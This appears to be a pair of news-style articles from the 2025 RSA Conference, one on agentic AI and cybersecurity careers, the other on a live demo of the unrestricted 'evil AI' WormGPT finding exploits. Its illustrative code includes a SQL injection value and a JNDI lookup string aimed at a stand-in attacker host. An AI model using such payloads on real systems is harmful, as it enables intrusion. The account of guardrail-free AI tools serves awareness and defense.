
Agentic AI Is Reshaping Cybersecurity Careers, Not Replacing Them

Agentic AI took center stage at the 2025 RSA Conference, signaling a major shift in how cybersecurity professionals will work in the near future. No longer a futuristic concept, agentic AI systems—capable of planning, acting, and learning independently—are already being deployed to streamline incident response, bolster compliance, and scale threat detection efforts. These intelligent agents operate with minimal human input, making real-time decisions and adapting to dynamic environments. 

While the promise of increased efficiency and resilience is driving rapid adoption, cybersecurity leaders also raised serious concerns. Experts like Elastic CISO Mandy Andress called for greater transparency and stronger oversight when deploying AI agents in sensitive environments. Trust, explainability, and governance emerged as recurring themes throughout RSAC, underscoring the need to balance innovation with caution—especially as cybercriminals are also experimenting with agentic AI to enhance and scale their attacks. 

For professionals in the field, this isn’t a moment to fear job loss—it’s a chance to embrace career transformation. New roles are already emerging. AI-Augmented Cybersecurity Analysts will shift from routine alert triage to validating agent insights and making strategic decisions. Security Agent Designers will define logic workflows and trust boundaries for AI operations, blending DevSecOps with AI governance. Meanwhile, AI Threat Hunters will work to identify how attackers may exploit these new tools and develop defense mechanisms in response. 

Another critical role on the horizon is the Autonomous SOC Architect, tasked with designing next-generation security operations centers powered by human-machine collaboration. There will also be growing demand for Governance and AI Ethics Leads who ensure that decisions made by AI agents are auditable, compliant, and ethically sound. These roles reflect how cybersecurity is evolving into a hybrid discipline requiring both technical fluency and ethical oversight. 

To stay competitive in this changing landscape, professionals should build new skills. This includes prompt engineering, agent orchestration using tools like LangChain, AI risk modeling, secure deployment practices, and frameworks for explainability. Human-AI collaboration strategies will also be essential, as security teams learn to partner with autonomous systems rather than merely supervise them. As IBM’s Suja Viswesan emphasized, “Security must be baked in—not bolted on.” That principle applies not only to how organizations deploy agentic AI but also to how they train and upskill their cybersecurity workforce. 
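To make "agent orchestration" concrete, below is a minimal, framework-free Python sketch of the plan-act-observe loop that frameworks like LangChain package up. Everything in it is hypothetical and illustrative: the stub planner stands in for an LLM, and the toy reputation-lookup and quarantine functions stand in for real threat-intelligence and EDR integrations.

from dataclasses import dataclass

@dataclass
class Alert:
    source_ip: str
    signature: str

def lookup_reputation(ip: str) -> str:
    # Tool: stand-in for a threat-intelligence lookup (hypothetical).
    known_bad = {"203.0.113.7"}  # TEST-NET address, purely illustrative
    return "malicious" if ip in known_bad else "unknown"

def quarantine_host(ip: str) -> str:
    # Tool: stand-in for an EDR containment action (hypothetical).
    return f"host {ip} quarantined (pending analyst review)"

TOOLS = {"lookup_reputation": lookup_reputation,
         "quarantine_host": quarantine_host}

def plan_next_action(alert: Alert, observations: list[str]):
    # Stub "planner" standing in for an LLM: decide the next tool call.
    if not observations:
        return ("lookup_reputation", alert.source_ip)
    if observations[-1] == "malicious":
        return ("quarantine_host", alert.source_ip)
    return None  # stop and escalate to a human analyst

def triage(alert: Alert) -> list[str]:
    observations: list[str] = []
    while (step := plan_next_action(alert, observations)) is not None:
        tool_name, argument = step
        observations.append(TOOLS[tool_name](argument))  # act, then observe
    return observations

print(triage(Alert("203.0.113.7", "beaconing")))

The division of labor is the point of the sketch: the model proposes each next step, ordinary code executes it, and the loop halts so that a human analyst gets the final call, which is exactly the kind of oversight RSAC speakers called for.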

The future of defense depends on professionals who understand how AI agents think, operate, and fail. Ultimately, agentic AI isn’t replacing people—it’s reshaping their roles. Human intuition, ethical reasoning, and strategic thinking remain vital in defending against modern cyber threats. 

As HackerOne CEO Kara Sprague noted, “Machines detect patterns. Humans understand motives.” Together, they can form a faster, smarter, and more adaptive line of defense. The cybersecurity industry isn’t just gaining new tools—it’s creating entirely new job titles and disciplines.

Threat Analysts Reveal How "Evil AI" is Changing Hacking Dynamics

A new wave of AI tools developed with no ethical restrictions is allowing hackers to detect and exploit software vulnerabilities faster than ever before. As these "evil AI" platforms advance quickly, cybersecurity experts fear that traditional defences will fail to keep up.

Earlier this week at the annual RSA Conference in San Francisco, a packed room at the Moscone Center gathered for what was billed as a technical investigation of artificial intelligence's role in contemporary hacking.

The session, presented by Sherri Davidoff and Matt Durrin of LMG Security, promised more than just theory: a rare, live demonstration of so-called "evil AI" in operation, a topic that has quickly moved from cyberpunk fiction to real-world concern.

Davidoff, LMG Security's founder and CEO, opened with a sobering reminder of the constant threat posed by software flaws. As PCWorld senior editor Alaina Yee reported, Durrin, the company's Director of Training and Research, quickly shifted the tone: he introduced the idea of "evil AI", artificial intelligence tools built without moral boundaries that can spot and exploit software vulnerabilities before defences can respond.

"What if hackers utilise their malevolent AI tools, which lack safeguards, to detect vulnerabilities before we have the opportunity to address them?" Durrin asked the audience, previewing the unsettling demonstrations to come. 

The team's attempts to acquire one of these rogue AIs, such as GhostGPT and DevilGPT, repeatedly ended in frustration or dead ends. Their persistence finally paid off when they obtained WormGPT, a tool mentioned in a Brian Krebs piece, for $50 via Telegram channels.

As Durrin explained, WormGPT is effectively ChatGPT stripped of its ethical constraints: it will answer any question, no matter how harmful or illegal the request. The presenters emphasised, however, that the main concern is not the tool's mere existence, but what it can actually do.

The LMG Security team began by feeding DotProject, an open-source project management platform, to an older version of WormGPT. The AI correctly identified a SQL vulnerability and proposed a simple exploit, but it failed to construct a working attack, most likely because it could not parse the entire codebase.
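LMG Security did not publish the flaw itself, and DotProject is a PHP application, so the Python snippet below is only a generic illustration of SQL injection, the most common class of SQL vulnerability and the kind of pattern such a tool would be hunting for. It contrasts an unsanitized string spliced into SQL with the parameterized fix.

# Generic illustration of SQL injection; this is NOT the actual
# DotProject flaw, just the vulnerability class being described.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin'), ('bob', 'user')")

def find_user_vulnerable(name: str):
    # VULNERABLE: untrusted input is spliced directly into the SQL text,
    # so a crafted value like "x' OR '1'='1" changes the query's meaning.
    return conn.execute(
        f"SELECT name, role FROM users WHERE name = '{name}'").fetchall()

def find_user_safe(name: str):
    # SAFE: a parameterized query keeps the input as data, never as SQL.
    return conn.execute(
        "SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()

payload = "x' OR '1'='1"
print(find_user_vulnerable(payload))  # every row returned: injection worked
print(find_user_safe(payload))        # []: the input stayed a literal string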

A revised version of WormGPT was then tasked with investigating the notorious Log4j vulnerability. This time the AI not only found the flaw but also provided enough detail that, as Davidoff noted, "an intermediate hacker" could use it to craft an exploit.
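For readers who missed the 2021 incident: the Log4j flaw (Log4Shell, CVE-2021-44228) arose because the Java logger actively resolved ${jndi:...} lookups inside attacker-supplied text, which could make it fetch and run remote code. The Python below is only a toy model of that dangerous shape, with no network activity and no relation to Log4j's real implementation.

# Toy model of the Log4Shell pattern: a logger that actively resolves
# ${...} lookups found inside untrusted log messages. In real Log4j 2,
# this resolution step could contact an attacker's LDAP server and load
# a remote class; here we merely mark where that would happen.
import re

def dangerous_log(message: str) -> str:
    def resolve(match: re.Match) -> str:
        # The side-effectful lookup would fire here in the real flaw.
        return f"<resolved lookup: {match.group(1)}>"
    # The bug in spirit: substitution runs over the whole message,
    # including the parts that came from an untrusted user.
    return re.sub(r"\$\{([^}]*)\}", resolve, message)

user_agent = "Mozilla/5.0 ${jndi:ldap://attacker.example/x}"  # attacker input
print(dangerous_log(f"request from {user_agent}"))
# -> request from Mozilla/5.0 <resolved lookup: jndi:ldap://attacker.example/x>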

The true surprise came with the most recent iteration: WormGPT provided step-by-step instructions, complete with code specific to the test server, and those instructions worked beautifully.

To push the limits further, the team set up a deliberately vulnerable Magento e-commerce installation. WormGPT uncovered a complex two-part exploit chain that popular security tools such as SonarQube, and even ChatGPT itself, had failed to flag. During the live demonstration, the rogue AI produced a complete hacking guide unprompted and with alarming speed. As the session drew to a close, Davidoff reflected on the rapid progress of malicious AI tools.